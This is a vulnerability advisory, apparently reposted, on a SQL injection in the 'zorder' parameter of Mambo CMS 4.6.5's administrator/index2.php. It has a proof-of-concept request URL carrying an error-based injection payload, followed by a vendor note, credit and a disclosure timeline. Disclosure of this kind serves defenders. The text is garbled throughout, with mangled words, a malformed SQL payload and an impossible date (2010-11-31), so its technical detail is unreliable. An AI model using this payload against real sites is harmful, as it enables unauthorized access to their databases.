========================================================== =
Mambo CMS 4.6.x (4.6.5) | SQL Injection
========================================================== =
1. Overview
Mambo CMS 4.6.5 and earlier versions contain injection Defects
2. Background
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex reset ate applications. it is used all over the world to power government portals, transferate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. mambo's "power in simplicity" also makes it the CMS of choice for processing small businesses and personal sites.
3. defect description
The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct SQL Injection attack. this coshould an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
4. Affected Versions
Mambo CMS 4.6.5 tested
5. PROOF-OF-CONCEPT/EXPLOIT
Http://www.bkjia.com/mambo/administrator/index2.php? Limit = 10 & order [] = 11 & boxchecked = 0 & toggle = on & search = sqli & task = & limitstart = 0 & cid [] = on & zorder =-1 OR (SELECT 9999 FROM (select count (*), CONCAT (CHAR (112,101, 9999, 58), (SELECT (case when (9999 = 58,110,100,107) THEN 1 ELSE 0 END), CHAR (, 58 ), FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) & filter_authorid = 62 & hidemainmenu = 0 & option = com_typedcontent
6. SOLUTION
The vendor seems to discontinue the development. It is recommended to use another CMS in active development.
7. VENDOR
Mambo CMS Development Team
Http://mambo-developer.org
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. disclosure time-LINE
2010-11-31: notified vendor through bug tracker
2011-08-12: no patched version released up to date
2011-08-12: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/?mambo4.6_x=_ SQL _injection
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip
# Yehg [2011-08-12]